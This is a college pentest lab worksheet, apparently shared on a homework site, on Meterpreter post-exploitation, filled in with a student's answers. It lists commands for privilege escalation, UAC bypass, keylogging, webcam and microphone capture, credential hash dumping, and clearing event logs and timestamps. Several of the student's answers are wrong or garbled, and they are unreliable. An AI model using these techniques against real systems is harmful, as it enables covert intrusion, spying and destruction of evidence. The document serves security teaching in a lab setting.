[Lab-Pentest] Post-Exploitation with Meterpreter

docx

School

Madison Area Technical College, Madison *

*We aren’t endorsed by this school

Course

804-208

Subject

Information Systems

Date

Dec 6, 2023

Type

docx

Pages

6

Uploaded by LavonCN

Report
[Lab-Pentest] Post-Exploitation with Meterpreter Getting started Before starting this lab be sure to complete [LAB] Metasploit RAT . One of the goals in that lab is to build a malicious file that includes Meterpreter as a payload. In this lab, you will take a deeper dive into the Meterpreter. Meterpreter Fundamentals The following outlines specific activities that can be performed when using Meterpreter. This is not an exhaustive list and you are encouraged to review the help provided in Meterpreter. Common Commands The following table identifies useful commands for post-exploitation activities. Command Description Explanation help List available commands Use this to review the available commands in Meterpreter. The list of available commands will change as you load more modules in the session. migrate Move from one process to another Use this to migrate Meterpreter from the initial process to one that isn’t easily stopped. getuid Display the username Use this to understand your current privilege level in the running Meterpreter shell. getpid Display the current process ID Use this to know which process owns the Meterpreter shell. ps Display all of the processes running in memory Use this to identify other targets to migrate to or understand what the user is doing. getsystem Get SYSTEM privileges in Use this to gain more privilege
the target OS than initially granted during the exploit process. kill Kill a running process Use this to kill a running process. getprivs Shows the current privileges This is distinct from getuid in that it shows privileges related to group memberships as well as user privileges. sysinfo Displays system information Use this to document interesting information about the target system. timestomp Alter timestamps Use this to modify timestamps to slow blue team activities clearev Clear Windows Event Logs Use this to destroy event log data screenshot Capture an image of the running desktop Use this to ‘see’ what is happening on the desktop. keyscan Activate the keystroke logger Use this to capture keystrokes being entered on the target system. keyscan_dum p Dump the captured keystrokes Use this to output the buffer of the keystroke logger. record_mic Begin capturing audio Use this to capture audio using any microphone attached to the target device. webcam_* Commands to capture video Use these commands to interact with a video capture device attached to the target system. download Download a file Use this to download a file from the target system. upload Upload a file Use this to upload a file to the target system. cat Display the contents of a file This works exactly like the traditional cat(1) program on a UNIX system. hashdump Display the contents of the local credential store Use this to capture any usernames and password hashes that are stored on the target system. This command requires you to have at least local admin privileges on the target system. background Send the meterpreter shell into the background Use this to return to the metasploit interface (msfconsole)
and enable the use of a post- exploitation module. exit Exit meterpreter Use this to exit the session. Meterpreter will also be scrubbed from memory. Post Modules The following table identifies useful POST modules in the Metasploit Framework Module Name Purpose post/windows/smart_hashdump A smarter version of ‘hashdump.’ This module can gather more information across a wider set of targets post/windows/gather/credentials/ vnc Used to gather credentials related to the VNC service post/windows/escalate/bypassuac Used to bypass User Account Control in Windows. This module is semi-reliable. Lab Activities Using the Meterpreter session created in [LAB] Metasploit RAT and the references provided in this document, perform the following tasks. 1. List all of the current running processes Command:__ps_______________________________________________ 2. Search for just the “ explorer ” process Command:_ search explorer_______________________________________________ Did you find it? __yes_________________________________________ Why or why not?:__it was justthere_________________________________________ 3. Get the current User account that you are logged in with Command:___getuid_____________________________________________ Username:__student______________________________________________ 4. Get the SID of the current user you are logged in as Command:___getsid_____________________________________________
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
5. Grab the “sysinfo” from the target machine Command: sysinfo_______________________________________________ 6. Take a screenshot of the currently logged in users desktop Command: ___ screenshot _____________________________________________ What could we use this for depending on what the user has open?:_to see files___________________________________________________ 7. Migrate your Meterpreter session into the “explorer.exe” process by name . Command: ___migrate explorer.exe_____________________________________________ What do we gain by migrating into this process: the gain is that we get get to see whether the app is 64 bit. _________________________________________________________ 8. List the current directory you are in on your LOCAL machine. (read this carefully) Command:_____lwpd____________________________________________ Directory:_C:\Users\student\documents_________________________________ ________________ 9. List the current directory you are in on the target machine. Command: __ls______________________________________________ Directory:___C:\Users\student/downloads_______________________________ _______________ 10. Navigate to the current users desktop (Note:this should be “C:\Users\Administrator.SECLAN\Desktop”) Command:____ > run getgui -u username -p password_____________________________________________ 11. Use the “edit” command to create a text file on the users desktop. Name the file “HelloAdmin.txt” and put “Hello Windows User :)” as the text. Command:____ edit HelloAdmin.txt______________________________________________ Can you open and read the file on the Windows 7 machine? _yes__________________________________________________________ As Meterpreter will use ‘vi’ as the default editor a quick vi lesson is in order. Once the file is open:
press the ‘ i ’ key to put the editor in “--INSERT--” mode. Now you can enter text. Once you are done editing, to save the file: <Esc><Shift> : wq 12. From the Meterpreter execute “notepad.exe”on the target machine opening the text file that you just created on the Windows 7 desktop. Note: Read the help for the execute command carefully as you need to pass the filename as an argument Command:___ executenotepad___________________________________________________ Did notepad open on the Windows 7 desktop: ___No___________________________________________________________ _ 13. Upload a copy of the clean (non trojan) version of putty to the victims Desktop. Note:If you do not still have the copy from the rat lab just download a new copy. Command:___ smbclient \\\\192.168.1.1\\c$ -U Administrator put putty.exe________________________________________________ Can you put the “putty.exe” file on the Desktop of the currently logged in user? (If not go back and “try harder” LOL :) ___Yes_______________________________________ 14. Kill the notepad process you just create by name (NOT BY PROCESS ID) Command:__ kill notepad_____________________________________________ 15. Grab the users login credentials when they use putty to ssh into the “webtarget” box. Hint:research the “keyscan_” commands. Note: You need to Putty to the “WebTarget” box in your lab environment from Windows 7 to generate the login info. Command:_____keyscan.start________________________________________ _______ Screencap of credentials: 16. Dump all of the user credentials on the target system. Command:____keyscan.dump________________________________________ _______
What can you do with this information?___use it to see what username the user is using.__________________________ 17. Clear the event logs on the target system Command:___ run event manager-c________________________________________________ Stretch Goal 1. Automate the whole process in an .rc file. NOTE: For step 11 in the lab, do not manually edit the file in your script. Just create the file on your Kali machine and then use your script to upload it.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help

Related Documents

SAB_BSBWHS521 Ensure a safe workplace for a work area Sept 2022 (1).pdf
C798 1C.docx
C798 check list.pdf
In this course.docx
When dealing with information that can be considered classified.docx
Assessment Evaluation_Reading Assignment.docx
[Lab-ThreatHunt] Team PCAP Analysis 1.docx
M02 - Part 2- Cengage Module 4 Case Project.docx
M01 - Part 1- Cengage Module 1 Case Project.docx
M05 - Part 1- Case Project 9-6 - Zero Trust.docx
217 MT prep.pdf
Pratice_Questions.pdf